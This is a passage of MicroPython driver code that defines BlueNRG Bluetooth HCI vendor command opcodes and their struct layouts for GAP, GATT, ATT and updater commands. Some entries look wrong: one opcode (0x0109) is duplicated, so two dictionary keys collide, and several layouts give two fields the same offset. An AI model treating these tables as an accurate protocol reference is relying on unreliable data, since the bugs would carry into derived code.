OCF_GAP_DELETE_AD_TYPE = const(0x008F)
OCF_GAP_GET_SECURITY_LEVEL = const(0x0090)
OCF_GAP_SET_EVT_MASK = const(0x0091)
OCF_GAP_CONFIGURE_WHITELIST = const(0x0092)
OCF_GAP_TERMINATE = const(0x0093)
OCF_GAP_CLEAR_SECURITY_DB = const(0x0094)
OCF_GAP_ALLOW_REBOND_DB = const(0x0095)
OCF_GAP_START_LIMITED_DISCOVERY_PROC = const(0x0096)
OCF_GAP_START_GENERAL_DISCOVERY_PROC = const(0x0097)
OCF_GAP_START_NAME_DISCOVERY_PROC = const(0x0098)
OCF_GAP_START_AUTO_CONN_ESTABLISH_PROC = const(0x0099)
OCF_GAP_START_GENERAL_CONN_ESTABLISH_PROC = const(0x009A)
OCF_GAP_START_SELECTIVE_CONN_ESTABLISH_PROC = const(0x009B)
OCF_GAP_CREATE_CONNECTION = const(0x009C)
OCF_GAP_TERMINATE_GAP_PROCEDURE = const(0x009D)
OCF_GAP_START_CONNECTION_UPDATE = const(0x009E)
OCF_GAP_SEND_PAIRING_REQUEST = const(0x009F)
OCF_GAP_RESOLVE_PRIVATE_ADDRESS = const(0x00A0)
OCF_GAP_SET_BROADCAST_MODE = const(0x00A1)
OCF_GAP_START_OBSERVATION_PROC = const(0x00A2)
OCF_GAP_GET_BONDED_DEVICES = const(0x00A3)
OCF_GAP_IS_DEVICE_BONDED = const(0x00A4)
OCF_GATT_INIT = const(0x0101)
OCF_GATT_ADD_SERV = const(0x0102)
OCF_GATT_INCLUDE_SERV = const(0x0103)
OCF_GATT_ADD_CHAR = const(0x0104)
OCF_GATT_ADD_CHAR_DESC = const(0x0105)
OCF_GATT_UPD_CHAR_VAL = const(0x0106)
OCF_GATT_DEL_CHAR = const(0x0107)
OCF_GATT_DEL_SERV = const(0x0108)
OCF_GATT_DEL_INC_SERV = const(0x0109)
OCF_GATT_SET_EVT_MASK = const(0x010A)
OCF_GATT_EXCHANGE_CONFIG = const(0x010B)
OCF_ATT_FIND_INFO_REQ = const(0x010C)
OCF_ATT_FIND_BY_TYPE_VALUE_REQ = const(0x010D)
OCF_ATT_READ_BY_TYPE_REQ = const(0x010E)
OCF_ATT_READ_BY_GROUP_TYPE_REQ = const(0x010F)
OCF_ATT_PREPARE_WRITE_REQ = const(0x0110)
OCF_ATT_EXECUTE_WRITE_REQ = const(0x0111)
OCF_GATT_DISC_ALL_PRIM_SERVICES = const(0x0112)
OCF_GATT_DISC_PRIM_SERVICE_BY_UUID = const(0x0113)
OCF_GATT_FIND_INCLUDED_SERVICES = const(0x0114)
OCF_GATT_DISC_ALL_CHARAC_OF_SERV = const(0x0115)
OCF_GATT_DISC_CHARAC_BY_UUID = const(0x0116)
OCF_GATT_DISC_ALL_CHARAC_DESCRIPTORS = const(0x0117)
OCF_GATT_READ_CHARAC_VAL = const(0x0118)
OCF_GATT_READ_USING_CHARAC_UUID = const(0x0109)
OCF_GATT_READ_LONG_CHARAC_VAL = const(0x011A)
OCF_GATT_READ_MULTIPLE_CHARAC_VAL = const(0x011B)
OCF_GATT_WRITE_CHAR_VALUE = const(0x011C)
OCF_GATT_WRITE_LONG_CHARAC_VAL = const(0x011D)
OCF_GATT_WRITE_CHARAC_RELIABLE = const(0x011E)
OCF_GATT_WRITE_LONG_CHARAC_DESC = const(0x011F)
OCF_GATT_READ_LONG_CHARAC_DESC = const(0x0120)
OCF_GATT_WRITE_CHAR_DESC = const(0x0121)
OCF_GATT_READ_CHAR_DESC = const(0x0122)
OCF_GATT_WRITE_WITHOUT_RESPONSE = const(0x0123)
OCF_GATT_SIGNED_WRITE_WITHOUT_RESPONSE = const(0x0124)
OCF_GATT_CONFIRM_INDICATION = const(0x0125)
OCF_GATT_WRITE_RESPONSE = const(0x0126)
OCF_GATT_ALLOW_READ = const(0x0127)
OCF_GATT_SET_SECURITY_PERMISSION = const(0x0128)
OCF_GATT_SET_DESC_VAL = const(0x0129)
OCF_GATT_READ_HANDLE_VALUE = const(0x012A)
OCF_GATT_READ_HANDLE_VALUE_OFFSET = const(0x012B)
OCF_GATT_UPD_CHAR_VAL_EXT = const(0x012C)
OCF_L2CAP_CONN_PARAM_UPDATE_REQ = const(0x0181)
OCF_L2CAP_CONN_PARAM_UPDATE_RESP = const(0x0182)
HCI_VENDOR_COMMANDS = [
"VENDOR_CMD",
{
OCF_HAL_GET_FW_BUILD_NUMBER: [
"HAL_GET_FW_BUILD_NUMBER",
None,
{
"status": uctypes.UINT8 | 0,
"build_number": uctypes.UINT16 | 1
}
],
OCF_HAL_WRITE_CONFIG_DATA: [
"HAL_WRITE_CONFIG_DATA",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_HAL_READ_CONFIG_DATA: [
"HAL_READ_CONFIG_DATA",
None,
{
"offset": uctypes.UINT8 | 0
}
],
OCF_HAL_SET_TX_POWER_LEVEL: [
"HAL_SET_TX_POWER_LEVEL",
{
"en_high_power": uctypes.UINT8 | 0,
"pa_level": uctypes.UINT8 | 1
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_HAL_DEVICE_STANDBY: [
"HAL_DEVICE_STANDBY",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_HAL_LE_TX_TEST_PACKET_NUMBER: [
"HAL_LE_TX_TEST_PACKET_NUMBER",
None,
{
"status": uctypes.UINT8 | 0,
"number_of_packets": uctypes.UINT32 | 1
}
],
OCF_HAL_TONE_START: [
"HAL_TONE_START",
{
"rf_channel": uctypes.UINT8 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_HAL_TONE_STOP: [
"HAL_TONE_STOP",
{
"rf_channel": uctypes.UINT8 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_HAL_GET_LINK_STATUS: [
"HAL_GET_LINK_STATUS",
None,
{
"status": uctypes.UINT8 | 0,
"link_status": (uctypes.ARRAY | 1, uctypes.UINT8 | 8),
"conn_handle": (uctypes.ARRAY | 9, uctypes.UINT16 | 8)
}
],
OCF_HAL_GET_ANCHOR_PERIOD: [
"HAL_GET_ANCHOR_PERIOD",
None,
{
"status": uctypes.UINT8 | 0,
"anchor_period": uctypes.UINT32 | 1,
"max_free_slot": uctypes.UINT32 | 5
}
],
OCF_UPDATER_START: [
"UPDATER_START",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_UPDATER_REBOOT: [
"UPDATER_REBOOT",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GET_UPDATER_VERSION: [
"GET_UPDATER_VERSION",
None,
{
"status": uctypes.UINT8 | 0,
"version": uctypes.UINT8 | 1
}
],
OCF_GET_UPDATER_BUFSIZE: [
"GET_UPDATER_BUFSIZE",
None,
{
"status": uctypes.UINT8 | 0,
"buffer_size": uctypes.UINT8 | 1
}
],
OCF_UPDATER_ERASE_BLUE_FLAG: [
"UPDATER_ERASE_BLUE_FLAG",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_UPDATER_RESET_BLUE_FLAG: [
"UPDATER_RESET_BLUE_FLAG",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_UPDATER_ERASE_SECTOR: [
"UPDATER_ERASE_SECTOR",
{
"address": uctypes.UINT32 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_UPDATER_READ_DATA_BLOCK: [
"UPDATER_READ_DATA_BLOCK",
{
"address": uctypes.UINT32 | 0,
"data_len": uctypes.UINT16 | 4
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_UPDATER_PROG_DATA_BLOCK: [
"UPDATER_PROG_DATA_BLOCK",
{
"address": uctypes.UINT32 | 0,
"data_len": uctypes.UINT16 | 4,
"data":
(uctypes.ARRAY | 6, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 6)
},
{
"status": uctypes.UINT8 | 0,
"data":
(uctypes.ARRAY | 1, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 1)
}
],
OCF_UPDATER_CALC_CRC: [
"UPDATER_CALC_CRC",
{
"address": uctypes.UINT32 | 0,
"num_sectors": uctypes.UINT8 | 4
},
{
"status": uctypes.UINT8 | 0,
"crc": uctypes.UINT32 | 1
}
],
OCF_UPDATER_HW_VERSION: [
"UPDATER_HW_VERSION",
None,
{
"status": uctypes.UINT8 | 0,
"version": uctypes.UINT8 | 1
}
],
OCF_GAP_SET_NON_DISCOVERABLE: [
"GAP_SET_NON_DISCOVERABLE",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SET_LIMITED_DISCOVERABLE: [
"GAP_SET_LIMITED_DISCOVERABLE",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SET_DISCOVERABLE: [
"GAP_SET_DISCOVERABLE",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SET_DIRECT_CONNECTABLE: [
"GAP_SET_DIRECT_CONNECTABLE",
{
"IDB05A1": {
"own_bdaddr_type": uctypes.UINT8 | 0,
"directed_adv_type": uctypes.UINT8 | 1,
"direct_bdaddr_type": uctypes.UINT8 | 2,
"direct_bdaddr": (uctypes.ARRAY | 3, uctypes.UINT8 | 6),
"adv_interv_min": uctypes.UINT16 | 9,
"adv_interv_max": uctypes.UINT16 | 11
},
"IDB04A1": {
"own_bdaddr_type": uctypes.UINT8 | 0,
"direct_bdaddr_type": uctypes.UINT8 | 1,
"direct_bdaddr": (uctypes.ARRAY | 2, uctypes.UINT8 | 6)
}
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SET_IO_CAPABILITY: [
"GAP_SET_IO_CAPABILITY",
{
"io_capability": uctypes.UINT8 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SET_AUTH_REQUIREMENT: [
"GAP_SET_AUTH_REQUIREMENT",
{
"mitm_mode": uctypes.UINT8 | 0,
"oob_enable": uctypes.UINT8 | 1,
"oob_data": (uctypes.ARRAY | 2, uctypes.UINT8 | 16),
"min_encryption_key_size": uctypes.UINT8 | 18,
"max_encryption_key_size": uctypes.UINT8 | 19,
"use_fixed_pin": uctypes.UINT8 | 20,
"fixed_pin": uctypes.UINT32 | 21,
"bonding_mode": uctypes.UINT8 | 25
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SET_AUTHOR_REQUIREMENT: [
"GAP_SET_AUTHOR_REQUIREMENT",
{
"conn_handle": uctypes.UINT16 | 0,
"authorization_enable": uctypes.UINT8 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_PASSKEY_RESPONSE: [
"GAP_PASSKEY_RESPONSE",
{
"conn_handle": uctypes.UINT16 | 0,
"passkey": uctypes.UINT32 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_AUTHORIZATION_RESPONSE: [
"GAP_AUTHORIZATION_RESPONSE",
{
"conn_handle": uctypes.UINT16 | 0,
"authorize": uctypes.UINT8 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_INIT: [
"GAP_INIT",
{
"IDB05A1": {
"role": uctypes.UINT8 | 0,
"privacy_enabled": uctypes.UINT8 | 1,
"device_name_char_len": uctypes.UINT8 | 2
},
"IDB04A1": {
"role": uctypes.UINT8 | 0
}
},
{
"status": uctypes.UINT8 | 0,
"service_handle": uctypes.UINT16 | 1,
"dev_name_char_handle": uctypes.UINT16 | 3,
"appearance_char_handle": uctypes.UINT16 | 5
}
],
OCF_GAP_SET_NON_CONNECTABLE: [
"GAP_SET_NON_CONNECTABLE",
{
"IDB05A1": {
"advertising_event_type": uctypes.UINT8 | 0,
"own_address_type": uctypes.UINT8 | 1
},
"IDB04A1": {
"advertising_event_type": uctypes.UINT8 | 0
}
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SET_UNDIRECTED_CONNECTABLE: [
"GAP_SET_UNDIRECTED_CONNECTABLE",
{
"adv_filter_policy": uctypes.UINT8 | 0,
"own_addr_type": uctypes.UINT8 | 1
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SLAVE_SECURITY_REQUEST: [
"GAP_SLAVE_SECURITY_REQUEST",
{
"conn_handle": uctypes.UINT16 | 0,
"bonding": uctypes.UINT8 | 2,
"mitm_protection": uctypes.UINT8 | 3
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_UPDATE_ADV_DATA: [
"GAP_UPDATE_ADV_DATA",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_DELETE_AD_TYPE: [
"GAP_DELETE_AD_TYPE",
{
"ad_type": uctypes.UINT8 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_GET_SECURITY_LEVEL: [
"GAP_GET_SECURITY_LEVEL",
None,
{
"status": uctypes.UINT8 | 0,
"mitm_protection": uctypes.UINT8 | 1,
"bonding": uctypes.UINT8 | 2,
"oob_data": uctypes.UINT8 | 3,
"passkey_required": uctypes.UINT8 | 4
}
],
OCF_GAP_SET_EVT_MASK: [
"GAP_SET_EVT_MASK",
{
"evt_mask": uctypes.UINT16 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_CONFIGURE_WHITELIST: [
"GAP_CONFIGURE_WHITELIST",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_TERMINATE: [
"GAP_TERMINATE",
{
"handle": uctypes.UINT16 | 0,
"reason": uctypes.UINT8 | 1
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_CLEAR_SECURITY_DB: [
"GAP_CLEAR_SECURITY_DB",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_ALLOW_REBOND_DB: [
"GAP_ALLOW_REBOND_DB",
{
"conn_handle": uctypes.UINT16 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_START_LIMITED_DISCOVERY_PROC: [
"GAP_START_LIMITED_DISCOVERY_PROC",
{
"scan_interval": uctypes.UINT16 | 0,
"scan_window": uctypes.UINT16 | 2,
"own_address_type": uctypes.UINT16 | 2,
"filter_duplicates": uctypes.UINT8 | 5
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_START_GENERAL_DISCOVERY_PROC: [
"GAP_START_GENERAL_DISCOVERY_PROC",
{
"scan_interval": uctypes.UINT16 | 0,
"scan_window": uctypes.UINT16 | 2,
"own_address_type": uctypes.UINT16 | 2,
"filter_duplicates": uctypes.UINT8 | 5
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_START_NAME_DISCOVERY_PROC: [
"GAP_START_NAME_DISCOVERY_PROC",
{
"scan_interval": uctypes.UINT16 | 0,
"scan_window": uctypes.UINT16 | 2,
"peer_bdaddr_type": uctypes.UINT8 | 4,
"peer_bdaddr": (uctypes.ARRAY | 5, uctypes.UINT8 | 6),
"own_bdaddr_type": uctypes.UINT8 | 11,
"conn_min_interval": uctypes.UINT16 | 12,
"conn_max_interval": uctypes.UINT16 | 14,
"conn_latency": uctypes.UINT16 | 16,
"supervision_timeout": uctypes.UINT16 | 18,
"min_conn_length": uctypes.UINT16 | 20,
"max_conn_length": uctypes.UINT16 | 22
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_START_AUTO_CONN_ESTABLISH_PROC: [
"GAP_START_AUTO_CONN_ESTABLISH_PROC",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_START_GENERAL_CONN_ESTABLISH_PROC: [
"GAP_START_GENERAL_CONN_ESTABLISH_PROC",
{
"IDB05A1": {
"scan_type": uctypes.UINT8 | 0,
"scan_interval": uctypes.UINT16 | 1,
"scan_window": uctypes.UINT16 | 3,
"own_address_type": uctypes.UINT8 | 5,
"filter_duplicates": uctypes.UINT8 | 6
},
"IDB04A1": {
"scan_type": uctypes.UINT8 | 0,
"scan_interval": uctypes.UINT16 | 1,
"scan_window": uctypes.UINT16 | 3,
"own_address_type": uctypes.UINT8 | 5,
"filter_duplicates": uctypes.UINT8 | 6,
"reconn_addr": (uctypes.ARRAY | 7, uctypes.UINT8 | 6)
}
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_START_SELECTIVE_CONN_ESTABLISH_PROC: [
"GAP_START_SELECTIVE_CONN_ESTABLISH_PROC",
{
"scan_type": uctypes.UINT8 | 0,
"scan_interval": uctypes.UINT16 | 1,
"scan_window": uctypes.UINT16 | 3,
"own_address_type": uctypes.UINT8 | 5,
"filter_duplicates": uctypes.UINT8 | 6,
"num_whitelist_entries": uctypes.UINT8 | 7,
"addr_array":
(uctypes.ARRAY | 8, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 8)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_CREATE_CONNECTION: [
"GAP_CREATE_CONNECTION",
{
"scan_interval": uctypes.UINT16 | 0,
"scan_window": uctypes.UINT16 | 2,
"peer_bdaddr_type": uctypes.UINT8 | 4,
"peer_bdaddr": (uctypes.ARRAY | 5, uctypes.UINT8 | 6),
"own_bdaddr_type": uctypes.UINT8 | 11,
"conn_min_interval": uctypes.UINT16 | 12,
"conn_max_interval": uctypes.UINT16 | 14,
"conn_latency": uctypes.UINT16 | 16,
"supervision_timeout": uctypes.UINT16 | 18,
"min_conn_length": uctypes.UINT16 | 20,
"max_conn_length": uctypes.UINT16 | 22
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_TERMINATE_GAP_PROCEDURE: [
"GAP_TERMINATE_GAP_PROCEDURE",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_START_CONNECTION_UPDATE: [
"GAP_START_CONNECTION_UPDATE",
{
"conn_handle": uctypes.UINT16 | 0,
"conn_min_interval": uctypes.UINT16 | 2,
"conn_max_interval": uctypes.UINT16 | 4,
"conn_latency": uctypes.UINT16 | 6,
"supervision_timeout": uctypes.UINT16 | 8,
"min_conn_length": uctypes.UINT16 | 10,
"max_conn_length": uctypes.UINT16 | 12
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SEND_PAIRING_REQUEST: [
"GAP_SEND_PAIRING_REQUEST",
{
"conn_handle": uctypes.UINT16 | 0,
"force_rebond": uctypes.UINT8 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_RESOLVE_PRIVATE_ADDRESS: [
"GAP_RESOLVE_PRIVATE_ADDRESS",
{
"IDB05A1": {
"address": (uctypes.ARRAY | 0, uctypes.UINT8 | 6)
},
"IDB04A1": None
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_SET_BROADCAST_MODE: [
"GAP_SET_BROADCAST_MODE",
{
"adv_interv_min": uctypes.UINT16 | 0,
"adv_interv_max": uctypes.UINT16 | 2,
"dv_type": uctypes.UINT8 | 4,
"own_addr_type": uctypes.UINT8 | 5,
"var_len_data":
(uctypes.ARRAY | 6, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 6)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_START_OBSERVATION_PROC: [
"GAP_START_OBSERVATION_PROC",
{
"scan_interval": uctypes.UINT16 | 0,
"scan_window": uctypes.UINT16 | 2,
"scan_type": uctypes.UINT8 | 4,
"own_address_type": uctypes.UINT8 | 5,
"filter_duplicates": uctypes.UINT8 | 6
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_GET_BONDED_DEVICES: [
"GAP_GET_BONDED_DEVICES",
None,
{
"status": uctypes.UINT8 | 0,
"num_addr": uctypes.UINT8 | 1,
"dev_list":
(uctypes.ARRAY | 2, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 2)
}
],
OCF_GAP_IS_DEVICE_BONDED: [
"GAP_IS_DEVICE_BONDED",
{
"peer_address_type": uctypes.UINT8 | 0,
"peer_address": (uctypes.ARRAY | 1, uctypes.UINT8 | 6)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_INIT: [
"GATT_INIT",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_ADD_SERV: [
"GATT_ADD_SERV",
None,
{
"status": uctypes.UINT8 | 0,
"handle": uctypes.UINT16 | 1
}
],
OCF_GATT_INCLUDE_SERV: [
"GATT_INCLUDE_SERV",
None,
{
"status": uctypes.UINT8 | 0,
"handle": uctypes.UINT16 | 1
}
],
OCF_GATT_ADD_CHAR: [
"GATT_ADD_CHAR",
None,
{
"status": uctypes.UINT8 | 0,
"handle": uctypes.UINT16 | 1
}
],
OCF_GATT_ADD_CHAR_DESC: [
"GATT_ADD_CHAR_DESC",
None,
{
"status": uctypes.UINT8 | 0,
"handle": uctypes.UINT16 | 1
}
],
OCF_GATT_UPD_CHAR_VAL: [
"GATT_UPD_CHAR_VAL",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_DEL_CHAR: [
"GATT_DEL_CHAR",
{
"service_handle": uctypes.UINT16 | 0,
"char_handle": uctypes.UINT16 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_DEL_SERV: [
"GATT_DEL_SERV",
{
"service_handle": uctypes.UINT16 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_DEL_INC_SERV: [
"GATT_DEL_INC_SERV",
{
"service_handle": uctypes.UINT16 | 0,
"inc_serv_handle": uctypes.UINT16 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_SET_EVT_MASK: [
"GATT_SET_EVT_MASK",
{
"evt_mask": uctypes.UINT32 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_EXCHANGE_CONFIG: [
"GATT_EXCHANGE_CONFIG",
{
"conn_handle": uctypes.UINT16 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_ATT_FIND_INFO_REQ: [
"ATT_FIND_INFO_REQ",
{
"conn_handle": uctypes.UINT16 | 0,
"start_handle": uctypes.UINT16 | 2,
"end_handle": uctypes.UINT16 | 4
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_ATT_FIND_BY_TYPE_VALUE_REQ: [
"ATT_FIND_BY_TYPE_VALUE_REQ",
{
"conn_handle": uctypes.UINT16 | 0,
"start_handle": uctypes.UINT16 | 2,
"end_handle": uctypes.UINT16 | 4,
"uuid": (uctypes.ARRAY | 6, uctypes.UINT8 | 2),
"attr_val_len": uctypes.UINT8 | 8,
"attr_val":
(uctypes.ARRAY | 9, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 9)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_ATT_READ_BY_TYPE_REQ: [
"ATT_READ_BY_TYPE_REQ",
{
"conn_handle": uctypes.UINT16 | 0,
"start_handle": uctypes.UINT16 | 2,
"end_handle": uctypes.UINT16 | 4,
"uuid_type": uctypes.UINT8 | 6,
"uuid": (uctypes.ARRAY | 7, uctypes.UINT8 | 16)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_ATT_READ_BY_GROUP_TYPE_REQ: [
"ATT_READ_BY_GROUP_TYPE_REQ",
{
"conn_handle": uctypes.UINT16 | 0,
"start_handle": uctypes.UINT16 | 2,
"end_handle": uctypes.UINT16 | 4,
"uuid_type": uctypes.UINT8 | 6,
"uuid": (uctypes.ARRAY | 7, uctypes.UINT8 | 16)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_ATT_PREPARE_WRITE_REQ: [
"ATT_PREPARE_WRITE_REQ",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"value_offset": uctypes.UINT16 | 4,
"attr_val_len": uctypes.UINT8 | 6,
"attr_val":
(uctypes.ARRAY | 7, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 7)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_ATT_EXECUTE_WRITE_REQ: [
"ATT_EXECUTE_WRITE_REQ",
{
"conn_handle": uctypes.UINT16 | 0,
"execute": uctypes.UINT8 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_DISC_ALL_PRIM_SERVICES: [
"GATT_DISC_ALL_PRIM_SERVICES",
{
"conn_handle": uctypes.UINT16 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_DISC_PRIM_SERVICE_BY_UUID: [
"GATT_DISC_PRIM_SERVICE_BY_UUID",
{
"conn_handle": uctypes.UINT16 | 0,
"uuid_type": uctypes.UINT8 | 2,
"uuid": (uctypes.ARRAY | 3, uctypes.UINT8 | 16)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_FIND_INCLUDED_SERVICES: [
"GATT_FIND_INCLUDED_SERVICES",
{
"conn_handle": uctypes.UINT16 | 0,
"start_handle": uctypes.UINT16 | 2,
"end_handle": uctypes.UINT16 | 4
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_DISC_ALL_CHARAC_OF_SERV: [
"GATT_DISC_ALL_CHARAC_OF_SERV",
{
"conn_handle": uctypes.UINT16 | 0,
"start_handle": uctypes.UINT16 | 2,
"end_handle": uctypes.UINT16 | 4
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_DISC_CHARAC_BY_UUID: [
"GATT_DISC_CHARAC_BY_UUID",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_DISC_ALL_CHARAC_DESCRIPTORS: [
"GATT_DISC_ALL_CHARAC_DESCRIPTORS",
{
"conn_handle": uctypes.UINT16 | 0,
"start_handle": uctypes.UINT16 | 2,
"end_handle": uctypes.UINT16 | 4
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_READ_CHARAC_VAL: [
"GATT_READ_CHARAC_VAL",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_READ_USING_CHARAC_UUID: [
"GATT_READ_USING_CHARAC_UUID",
{
"conn_handle": uctypes.UINT16 | 0,
"start_handle": uctypes.UINT16 | 2,
"end_handle": uctypes.UINT16 | 4,
"uuid_type": uctypes.UINT8 | 6,
"uuid": (uctypes.ARRAY | 7, uctypes.UINT8 | 16)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_READ_LONG_CHARAC_VAL: [
"GATT_READ_LONG_CHARAC_VAL",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"val_offset": uctypes.UINT16 | 4
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_READ_MULTIPLE_CHARAC_VAL: [
"GATT_READ_MULTIPLE_CHARAC_VAL",
{
"conn_handle": uctypes.UINT16 | 0,
"num_handles": uctypes.UINT8 | 2,
"set_of_handles":
(uctypes.ARRAY | 3, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 3)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_WRITE_CHAR_VALUE: [
"GATT_WRITE_CHAR_VALUE",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_WRITE_LONG_CHARAC_VAL: [
"GATT_WRITE_LONG_CHARAC_VAL",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"val_offset": uctypes.UINT16 | 4,
"val_len": uctypes.UINT8 | 6,
"attr_val":
(uctypes.ARRAY | 7, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 7)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_WRITE_CHARAC_RELIABLE: [
"GATT_WRITE_CHARAC_RELIABLE",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"val_offset": uctypes.UINT16 | 4,
"val_len": uctypes.UINT8 | 6,
"attr_val":
(uctypes.ARRAY | 7, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 7)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_WRITE_LONG_CHARAC_DESC: [
"GATT_WRITE_LONG_CHARAC_DESC",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"val_offset": uctypes.UINT16 | 4,
"val_len": uctypes.UINT8 | 6,
"attr_val":
(uctypes.ARRAY | 7, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 7)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_READ_LONG_CHARAC_DESC: [
"GATT_READ_LONG_CHARAC_DESC",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"val_offset": uctypes.UINT16 | 4
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_WRITE_CHAR_DESC: [
"GATT_WRITE_CHAR_DESC",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_READ_CHAR_DESC: [
"GATT_READ_CHAR_DESC",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_WRITE_WITHOUT_RESPONSE: [
"GATT_WRITE_WITHOUT_RESPONSE",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"val_len": uctypes.UINT8 | 4,
"attr_val":
(uctypes.ARRAY | 5, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 5)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_SIGNED_WRITE_WITHOUT_RESPONSE: [
"GATT_SIGNED_WRITE_WITHOUT_RESPONSE",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"val_len": uctypes.UINT8 | 4,
"attr_val":
(uctypes.ARRAY | 5, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 5)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_CONFIRM_INDICATION: [
"GATT_CONFIRM_INDICATION",
{
"conn_handle": uctypes.UINT16 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_WRITE_RESPONSE: [
